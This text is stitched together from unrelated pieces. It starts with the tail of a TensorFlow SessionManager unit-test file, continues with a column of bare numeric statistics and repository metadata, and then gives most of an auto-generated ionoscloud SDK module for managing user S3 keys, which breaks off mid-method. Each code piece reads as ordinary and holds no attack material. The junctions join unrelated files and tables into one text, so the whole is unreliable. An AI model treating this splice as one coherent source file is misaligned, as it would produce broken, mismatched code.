            self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))

    def testPrepareSessionSucceedsWithInitFn(self):
        """prepare_session can initialize via a callable instead of an op."""
        with tf.Graph().as_default():
            v = tf.Variable([125], name="v")
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            sess = sm.prepare_session("",
                                      init_fn=lambda sess: sess.run(v.initializer))
            self.assertAllClose([125], sess.run(v))

    def testPrepareSessionFails(self):
        """prepare_session without init_op fails unless a checkpoint exists."""
        checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
        checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
        try:
            gfile.DeleteRecursively(checkpoint_dir)
            gfile.DeleteRecursively(checkpoint_dir2)
        except OSError:
            pass  # Ignore
        gfile.MakeDirs(checkpoint_dir)

        with tf.Graph().as_default():
            v = tf.Variable([1.0, 2.0, 3.0], name="v")
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            saver = tf.train.Saver({"v": v})
            sess = sm.prepare_session("", init_op=tf.initialize_all_variables(),
                                      saver=saver, checkpoint_dir=checkpoint_dir)
            self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
            checkpoint_filename = os.path.join(checkpoint_dir,
                                               "prepare_session_checkpoint")
            saver.save(sess, checkpoint_filename)
        # Create a new Graph and SessionManager and recover.
        with tf.Graph().as_default():
            # Renames the checkpoint directory.
            os.rename(checkpoint_dir, checkpoint_dir2)
            gfile.MakeDirs(checkpoint_dir)
            v = tf.Variable([6.0, 7.0, 8.0], name="v")
            with self.test_session():
                self.assertEqual(False, tf.is_variable_initialized(v).eval())
            # BUG FIX: keep the new SessionManager.  SessionManager binds to the
            # default graph at construction time; previously the constructor
            # result was discarded and the stale `sm` from the first graph was
            # reused below, mixing a session on the old graph with a saver
            # built on the new one.
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            saver = tf.train.Saver({"v": v})
            # This should fail as there's no checkpoint within 2 seconds.
            with self.assertRaisesRegexp(
                RuntimeError, "no init_op or init_fn or local_init_op was given"):
                sess = sm.prepare_session("", init_op=None, saver=saver,
                                          checkpoint_dir=checkpoint_dir,
                                          wait_for_checkpoint=True,
                                          max_wait_secs=2)
            # Rename the checkpoint directory back.
            gfile.DeleteRecursively(checkpoint_dir)
            os.rename(checkpoint_dir2, checkpoint_dir)
            # This should succeed as there's checkpoint.
            sess = sm.prepare_session("", init_op=None, saver=saver,
                                      checkpoint_dir=checkpoint_dir,
                                      wait_for_checkpoint=True, max_wait_secs=2)
            self.assertEqual(
                True, tf.is_variable_initialized(
                    sess.graph.get_tensor_by_name("v:0")).eval(session=sess))

    def testRecoverSession(self):
        """recover_session restores variables from an existing checkpoint."""
        # Create a checkpoint.
        checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
        try:
            gfile.DeleteRecursively(checkpoint_dir)
        except OSError:
            pass  # Ignore
        gfile.MakeDirs(checkpoint_dir)

        with tf.Graph().as_default():
            v = tf.Variable(1, name="v")
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            saver = tf.train.Saver({"v": v})
            sess, initialized = sm.recover_session("", saver=saver,
                                                   checkpoint_dir=checkpoint_dir)
            self.assertFalse(initialized)
            sess.run(v.initializer)
            # `assertEquals` is a deprecated alias; use `assertEqual`.
            self.assertEqual(1, sess.run(v))
            saver.save(sess, os.path.join(checkpoint_dir,
                                          "recover_session_checkpoint"))
        # Create a new Graph and SessionManager and recover.
        with tf.Graph().as_default():
            v = tf.Variable(2, name="v")
            with self.test_session():
                self.assertEqual(False, tf.is_variable_initialized(v).eval())
            sm2 = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            saver = tf.train.Saver({"v": v})
            sess, initialized = sm2.recover_session("", saver=saver,
                                                    checkpoint_dir=checkpoint_dir)
            self.assertTrue(initialized)
            self.assertEqual(
                True, tf.is_variable_initialized(
                    sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
            # The checkpointed value (1), not the new initial value (2).
            self.assertEqual(1, sess.run(v))

    def testWaitForSessionReturnsNoneAfterTimeout(self):
        """wait_for_session raises DeadlineExceededError once max_wait_secs
        elapses without the model becoming ready."""
        with tf.Graph().as_default():
            tf.Variable(1, name="v")
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized(),
                                         recovery_wait_secs=1)
            # Set max_wait_secs to allow us to try a few times.
            with self.assertRaises(errors.DeadlineExceededError):
                sm.wait_for_session(master="", max_wait_secs=3)
# Standard TensorFlow test entry point: discovers and runs the test cases above.
if __name__ == "__main__":
    tf.test.main()
| 41.879479
| 80
| 0.64109
| 3,076
| 25,714
| 5.150845
| 0.08225
| 0.054153
| 0.025751
| 0.049356
| 0.866511
| 0.859821
| 0.854077
| 0.849659
| 0.849154
| 0.841075
| 0
| 0.010453
| 0.244731
| 25,714
| 613
| 81
| 41.947798
| 0.805365
| 0.090534
| 0
| 0.899029
| 0
| 0
| 0.035972
| 0.013848
| 0
| 0
| 0
| 0
| 0.165049
| 1
| 0.046602
| false
| 0.017476
| 0.013592
| 0
| 0.064078
| 0.001942
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e873ce1eee6bad3cefbb43023792e0a1d5ae97dd
| 56,915
|
py
|
Python
|
ionoscloud/api/user_s3_keys_api.py
|
ionos-cloud/ionos-cloud-sdk-python
|
3c5804697c262898e6f6a438dc40e1b45a4bb5c9
|
[
"Apache-2.0"
] | null | null | null |
ionoscloud/api/user_s3_keys_api.py
|
ionos-cloud/ionos-cloud-sdk-python
|
3c5804697c262898e6f6a438dc40e1b45a4bb5c9
|
[
"Apache-2.0"
] | null | null | null |
ionoscloud/api/user_s3_keys_api.py
|
ionos-cloud/ionos-cloud-sdk-python
|
3c5804697c262898e6f6a438dc40e1b45a4bb5c9
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
import re # noqa: F401
import six
from ionoscloud.api_client import ApiClient
from ionoscloud.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class UserS3KeysApi(object):
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def um_users_s3keys_delete(self, user_id, key_id, **kwargs): # noqa: E501
"""Delete S3 keys # noqa: E501
Delete the specified user S3 key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_delete(user_id, key_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_delete_with_http_info(user_id, key_id, **kwargs) # noqa: E501
def um_users_s3keys_delete_with_http_info(self, user_id, key_id, **kwargs):  # noqa: E501
    """Delete S3 keys  # noqa: E501

    Delete the specified user S3 key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.um_users_s3keys_delete_with_http_info(user_id, key_id, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param key_id: The unique ID of the S3 key. (required)
    :type key_id: str
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
    :type depth: int
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: None
    """
    # NOTE: `locals()` is captured before any other local exists, so it holds
    # exactly the declared parameters plus the raw `kwargs` dict.  Adding or
    # renaming locals above this line would corrupt the parameter handling.
    local_var_params = locals()

    all_params = [
        'user_id',
        'key_id',
        'pretty',
        'depth',
        'x_contract_number'
    ]
    # Framework-level options accepted by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth',
            'response_type',
            'query_params'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones into
    # local_var_params so the lookups below see a single dict.
    for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
        if local_var_params_key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method um_users_s3keys_delete" % local_var_params_key
            )
        local_var_params[local_var_params_key] = local_var_params_val
    del local_var_params['kwargs']
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_delete`")  # noqa: E501
    # verify the required parameter 'key_id' is set
    if self.api_client.client_side_validation and ('key_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['key_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `key_id` when calling `um_users_s3keys_delete`")  # noqa: E501

    # The API only accepts depth values in [0, 10].
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_delete`, must be a value less than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_delete`, must be a value greater than or equal to `0`")  # noqa: E501
    collection_formats = {}

    # Values substituted into the {userId}/{keyId} path template.
    path_params = {}
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501
    if 'key_id' in local_var_params:
        path_params['keyId'] = local_var_params['key_id']  # noqa: E501

    # Start from any caller-supplied raw query params, then add the known ones.
    query_params = list(local_var_params.get('query_params', {}).items())
    if 'pretty' in local_var_params and local_var_params['pretty'] is not None:  # noqa: E501
        query_params.append(('pretty', local_var_params['pretty']))  # noqa: E501
    if 'depth' in local_var_params and local_var_params['depth'] is not None:  # noqa: E501
        query_params.append(('depth', local_var_params['depth']))  # noqa: E501

    header_params = {}
    if 'x_contract_number' in local_var_params:
        header_params['X-Contract-Number'] = local_var_params['x_contract_number']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Basic Authentication', 'Token Authentication']  # noqa: E501

    # DELETE returns no body, so the default response type is None; callers
    # may still override it via the `response_type` kwarg.
    response_type = None
    if 'response_type' in kwargs:
        response_type = kwargs['response_type']

    return self.api_client.call_api(
        '/um/users/{userId}/s3keys/{keyId}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=response_type,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_find_by_key_id(self, user_id, key_id, **kwargs): # noqa: E501
"""Retrieve user S3 keys by key ID # noqa: E501
Retrieve the specified user S3 key. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. The key ID is in the response body when the S3 key is created, and in the list of all user S3 keys, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_find_by_key_id(user_id, key_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Key
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_find_by_key_id_with_http_info(user_id, key_id, **kwargs) # noqa: E501
def um_users_s3keys_find_by_key_id_with_http_info(self, user_id, key_id, **kwargs):  # noqa: E501
    """Retrieve user S3 keys by key ID  # noqa: E501

    Retrieve the specified user S3 key. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. The key ID is in the response body when the S3 key is created, and in the list of all user S3 keys, returned by GET.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.um_users_s3keys_find_by_key_id_with_http_info(user_id, key_id, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param key_id: The unique ID of the S3 key. (required)
    :type key_id: str
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
    :type depth: int
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(S3Key, status_code(int), headers(HTTPHeaderDict))
    """
    # NOTE: `locals()` is captured before any other local exists, so it holds
    # exactly the declared parameters plus the raw `kwargs` dict.  Adding or
    # renaming locals above this line would corrupt the parameter handling.
    local_var_params = locals()

    all_params = [
        'user_id',
        'key_id',
        'pretty',
        'depth',
        'x_contract_number'
    ]
    # Framework-level options accepted by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth',
            'response_type',
            'query_params'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones into
    # local_var_params so the lookups below see a single dict.
    for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
        if local_var_params_key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method um_users_s3keys_find_by_key_id" % local_var_params_key
            )
        local_var_params[local_var_params_key] = local_var_params_val
    del local_var_params['kwargs']
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_find_by_key_id`")  # noqa: E501
    # verify the required parameter 'key_id' is set
    if self.api_client.client_side_validation and ('key_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['key_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `key_id` when calling `um_users_s3keys_find_by_key_id`")  # noqa: E501

    # The API only accepts depth values in [0, 10].
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_find_by_key_id`, must be a value less than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_find_by_key_id`, must be a value greater than or equal to `0`")  # noqa: E501
    collection_formats = {}

    # Values substituted into the {userId}/{keyId} path template.
    path_params = {}
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501
    if 'key_id' in local_var_params:
        path_params['keyId'] = local_var_params['key_id']  # noqa: E501

    # Start from any caller-supplied raw query params, then add the known ones.
    query_params = list(local_var_params.get('query_params', {}).items())
    if 'pretty' in local_var_params and local_var_params['pretty'] is not None:  # noqa: E501
        query_params.append(('pretty', local_var_params['pretty']))  # noqa: E501
    if 'depth' in local_var_params and local_var_params['depth'] is not None:  # noqa: E501
        query_params.append(('depth', local_var_params['depth']))  # noqa: E501

    header_params = {}
    if 'x_contract_number' in local_var_params:
        header_params['X-Contract-Number'] = local_var_params['x_contract_number']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Basic Authentication', 'Token Authentication']  # noqa: E501

    # Deserialize the body into an S3Key model unless the caller overrides
    # the response type via the `response_type` kwarg.
    response_type = 'S3Key'
    if 'response_type' in kwargs:
        response_type = kwargs['response_type']

    return self.api_client.call_api(
        '/um/users/{userId}/s3keys/{keyId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=response_type,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_get(self, user_id, **kwargs): # noqa: E501
"""List user S3 keys # noqa: E501
List S3 keys by user ID. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_get(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Keys
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_get_with_http_info(user_id, **kwargs) # noqa: E501
def um_users_s3keys_get_with_http_info(self, user_id, **kwargs):  # noqa: E501
    """List user S3 keys  # noqa: E501

    List S3 keys by user ID. The user ID is in the response body when the user is created, and in the list of the users, returned by GET.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.um_users_s3keys_get_with_http_info(user_id, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
    :type depth: int
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(S3Keys, status_code(int), headers(HTTPHeaderDict))
    """
    # NOTE: `locals()` is captured before any other local exists, so it holds
    # exactly the declared parameters plus the raw `kwargs` dict.  Adding or
    # renaming locals above this line would corrupt the parameter handling.
    local_var_params = locals()

    all_params = [
        'user_id',
        'pretty',
        'depth',
        'x_contract_number'
    ]
    # Framework-level options accepted by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth',
            'response_type',
            'query_params'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones into
    # local_var_params so the lookups below see a single dict.
    for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
        if local_var_params_key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method um_users_s3keys_get" % local_var_params_key
            )
        local_var_params[local_var_params_key] = local_var_params_val
    del local_var_params['kwargs']
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_get`")  # noqa: E501

    # The API only accepts depth values in [0, 10].
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_get`, must be a value less than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_get`, must be a value greater than or equal to `0`")  # noqa: E501
    collection_formats = {}

    # Value substituted into the {userId} path template.
    path_params = {}
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501

    # Start from any caller-supplied raw query params, then add the known ones.
    query_params = list(local_var_params.get('query_params', {}).items())
    if 'pretty' in local_var_params and local_var_params['pretty'] is not None:  # noqa: E501
        query_params.append(('pretty', local_var_params['pretty']))  # noqa: E501
    if 'depth' in local_var_params and local_var_params['depth'] is not None:  # noqa: E501
        query_params.append(('depth', local_var_params['depth']))  # noqa: E501

    header_params = {}
    if 'x_contract_number' in local_var_params:
        header_params['X-Contract-Number'] = local_var_params['x_contract_number']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Basic Authentication', 'Token Authentication']  # noqa: E501

    # Deserialize the body into an S3Keys collection unless the caller
    # overrides the response type via the `response_type` kwarg.
    response_type = 'S3Keys'
    if 'response_type' in kwargs:
        response_type = kwargs['response_type']

    return self.api_client.call_api(
        '/um/users/{userId}/s3keys', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=response_type,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_post(self, user_id, **kwargs): # noqa: E501
"""Create user S3 keys # noqa: E501
Create an S3 key for the specified user. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. A maximum of five keys per user can be generated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_post(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Key
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_post_with_http_info(user_id, **kwargs) # noqa: E501
def um_users_s3keys_post_with_http_info(self, user_id, **kwargs):  # noqa: E501
    """Create user S3 keys  # noqa: E501

    Create an S3 key for the specified user. The user ID is in the response
    body when the user is created, and in the list of the users, returned by
    GET. A maximum of five keys per user can be generated.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.um_users_s3keys_post_with_http_info(user_id, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
    :type depth: int
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(S3Key, status_code(int), headers(HTTPHeaderDict))
    """
    # NOTE: locals() is captured before any other local is bound, so it holds
    # exactly `self`, `user_id` and the raw `kwargs` dict; accepted keyword
    # arguments are merged into it below for uniform key-based access.
    local_var_params = locals()
    # Parameters defined by the API spec for this operation.
    all_params = [
        'user_id',
        'pretty',
        'depth',
        'x_contract_number'
    ]
    # Framework-level options accepted by every operation.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth',
            'response_type',
            'query_params'
        ]
    )
    # Reject unknown keyword arguments early, then flatten the accepted ones
    # into local_var_params and drop the nested kwargs dict.
